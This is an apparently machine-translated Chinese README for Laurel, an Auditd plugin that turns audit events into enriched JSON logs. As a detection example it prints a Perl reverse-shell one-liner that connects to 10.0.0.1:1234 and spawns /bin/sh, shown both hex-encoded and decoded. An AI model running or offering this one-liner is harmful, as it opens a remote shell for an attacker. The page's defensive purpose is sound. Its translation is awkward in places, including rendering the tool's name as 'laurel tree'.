laurel
v0.6.4
Laurel是Auditd(8)的事件后处理插件,可生成适用于现代安全监视设置的有用的,富含JSON的审核日志。
与最新稳定版本相对应的文档可以在此处找到。
TLDR:而不是看起来像这样的审计事件…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
…月桂树将它们变成了JSON日志,攻击者/穿透者测试人员/红色团队者试图制造的混乱变得乍一看很明显:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};"]}, …}
这发生在来源上,因为月桂树在生成审计事件的主机上运行。事件丰富了有关父过程(PPID)的有用信息:
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
配置和操作细节在月桂树(8)手册页中描述。有关日志格式和理由的详细信息,请参见laurel-about(7)手册页。月桂树审计规则(7)页面包含建议和示例,以配置可用于检测攻击者战术的审计规则。
月桂树安装指令包含有关如何从源构建LARUEL以及如何安装和配置的说明。
我们开发了月桂树,因为我们不满足现有项目和产品的功能集和性能特征。有关详细信息,请参考性能文档。
GNU通用公共许可证,版本3
徽标由Birgit Meyer <[email protected]>创建。
